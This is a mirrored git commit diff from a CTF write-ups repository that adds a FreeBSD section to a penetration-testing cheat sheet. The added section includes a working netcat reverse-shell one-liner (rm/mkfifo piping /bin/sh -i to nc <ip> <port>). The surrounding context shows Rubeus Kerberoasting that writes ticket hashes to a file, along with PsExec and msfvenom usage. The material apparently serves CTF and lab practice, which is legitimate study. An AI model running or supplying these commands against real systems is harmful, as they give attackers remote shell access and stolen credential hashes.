mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-10 06:34:17 +00:00
Update Cheat Sheet.md
This commit is contained in:
parent
d8a53dd779
commit
c8ba36bd19
1 changed files with 10 additions and 0 deletions
|
@ -304,6 +304,16 @@ If the system has `PsExec.exe` open elevated cmd
|
|||
* Documentation `https://github.com/GhostPack/Rubeus`
|
||||
* Transfer rubeus.exe on targeted windows machine and run `.\Rubeus.exe kerberoast /outfile:C:\temp\hash.txt` to get a hash
|
||||
|
||||
# FreeBSD
|
||||
|
||||
### Enumeration
|
||||
|
||||
* The path for binaries is `/usr/local/bin`
|
||||
|
||||
### Reverse Shell
|
||||
|
||||
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc <ip> <port> > /tmp/f`
|
||||
|
||||
# Msfvenom
|
||||
### List All Payloads
|
||||
msfvenom -l payloads
|
||||
|
|
Loading…
Reference in a new issue